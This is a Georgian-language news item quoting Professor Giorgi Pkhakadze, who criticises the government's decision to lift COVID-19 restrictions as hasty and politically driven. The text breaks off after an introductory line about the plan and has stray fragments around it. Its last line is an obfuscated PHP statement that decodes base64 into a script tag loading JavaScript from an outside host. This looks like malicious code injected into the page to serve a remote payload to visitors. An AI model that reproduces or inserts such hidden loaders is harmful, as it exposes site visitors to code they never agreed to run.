celsiusi
ავერსი საქკაბელი
გაეროს გენერალური მდივნის მრჩეველი, დამოუკიდებელი ექსპერტი, პროფესორი გიორგი ფხაკაძე საინფორმაციო სააგენტო "ბიზნესთაიმთან" დღეს შეზღუდვების მოხსნის გადაწყვეტილების შეფასებისას განუცხადა, რომ "მიღებული გადაწყვეტილება ნაჩქარევი".
 
“ეს, ასევე აღიარებაა იმისა, რომ დაავადებათა კონტროლის ცენტრი არის პოლიტიკური ორგანიზაცია და ამას არავითარი საერთო არ აქვს ჯანდაცვასთან და ეპიდემიოლოგიასთან, შესაბამისად ის გადაწყვეტილებები და რეკომენდაციები, რომელიც მოდის დაავადებათა კონტროლის ცენტრიდან არის სუფთა პოლიტიკური ხასიათის და არა მეცნიერული და სამედიცინო ხასიათის. სამწუხაროა, მაგრამ ეს არის ის რასაც ჩვენ ვხედავთ", - განუცხადა ფხაკაძემ “ბიზნესთაიმს”. 
 
მისივე თქმით, ეპიდემიოლოგიურად უნდა იყოს შეფასებული არა მარტო ის სურათი რასაც დღეს ვხედავთ, არამედ ისიც, რაც იყო გუშინ და რაც იქნება ხვალ. 
 
“მე ქვეყნის გახსნას მივესალმები და საწინააღმდეგო არაფერი მაქვს, ოღონდ მკაცრი რეგულაციებით. მე დღეს ამ პრესკომფერენციიდან გავიგე მხოლოდ ის, რომ ქვეყანა იხსნება ყოველგვარი რეგულაციების გარეშე. პრაქტიკულად დღეს გამოცხადდა, რომ საქართველო იქნება ისე, როგორც იყო აგვისტოში და ნოემბარში, რაც მივიღეთ ყველას კარგად გვახსოვს.  ეს რეალობა აჩვენებს, რომ ჩვენ ძალიან მოკლე მეხსიერება გვაქვს და ის მონაპოვარი, რომელიც ჩვენ გვაქვს ძალიან იოლად შეიძლება დაიკარგოს, იმიტომ რომ ეს ვირუსი არ პატიობს არავის და არაფერს. ამ ვირუსთან ჩვენ უნდა ვიყოთ ძალიან ფრთხილად და გათვლილი უნდა იყოს ყველაფერი, ეს პრაქტიკულად არის მთლიანი ქვეყნის გახსნა", - განაცხადა გიორგი ფხაკაძემ.
 
როგორც ფხაკაძემ განმარტა, ეს იმის დასტურია, რომ ეპიდემიოლეგებმა ვერ შეძლეს ეპიდემიოლოგიური და მეცნიერული რჩევების მიცემა, იმიტომ რომ არიან პოლიტიზირებულნი.
 
“სისტემა არის შესაცვლელი. უნდა იყოს როგორც ომბუცმენის სამსახური, დამოუკიდებელი ორგონო, მრჩეველთა საბჭო, რომელიც მთავრობას მისცემს დამოუკიდებელ რჩევებს (არ აქვს მნიშვნელობა რომელი მთავრობა იქნება) მთავარია ეპიდემიოლოგებმა დამოუკიდებლად მიღებული ეპიდემიოლოგიური რჩევები გასცენ და მერე მთავრობა შესაბამისად მიიღებს გადაწყვეტილებას. ის რაც ჩვენ მივიღეთ ნოემბერში იყო დაავადებათა კონტროლის ცენტრის ჩავარდნა. გახსნა ქვეყნის მიხარია, მაგრამ მაშინებს ის, რომ მონაპოვარი რომელიც ახლა გვაქვს, ისევე არ დავკარგოთ როგორც ნოემბერში… მე იმედს ვიტოვებ, რომ იქნება რეგულაციები გამკაცრებული და ჩემი ნათქვამი აპრილთან დაკავშირებით არ გამართლდება", - განაცხადა ფხაკაძემ.
 
მისივე თქმით, ქვეყანა უნდა იხსნებოდეს მაშინ, როცა ვირუსი დამარცხებულია, მაგალითად თუ ვაქცინაციის პროგრამა აქვს ქვეყანას ისეთი, როგორც ისრაელში.
 
“ვაქცინა ყვეყანაში არ არის , ჯანდაცვის სისტემა მომზადებული არ არის, ჩვენ ყველაფერს ვხსნით და რეგულაციებიც კი არ არის კარგად გაწერილი და ეს ყველაფერი ხდება ნაჩქარევად, ჩვენ ყველაფერს ვაკეთებთ იმისთვის, რომ ჩვენ გვქონდეს აფეთქება რამოდენიმე თვეში. ეს არის პოლიტიკური ნაჩქარევი გადაწყვეტილება და ამას არფერი საერთო არ აქვს არც ეპიდემიოლოგიასთან , არც მეცნიერებასთან, არც მედიცინასთან და არც საღ გონებასთან“, - დასძინა გიორგი ფხაკაძემ.
 
შეგახსენებთ, რომ „მთავრობის უწყებათაშორისი საკოორდინაციო საბჭოს გადაწყვეტილებით, რეგულაციების შემსუბუქების გეგმა დღეს წარმოადგინა: 
 
 
5850
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");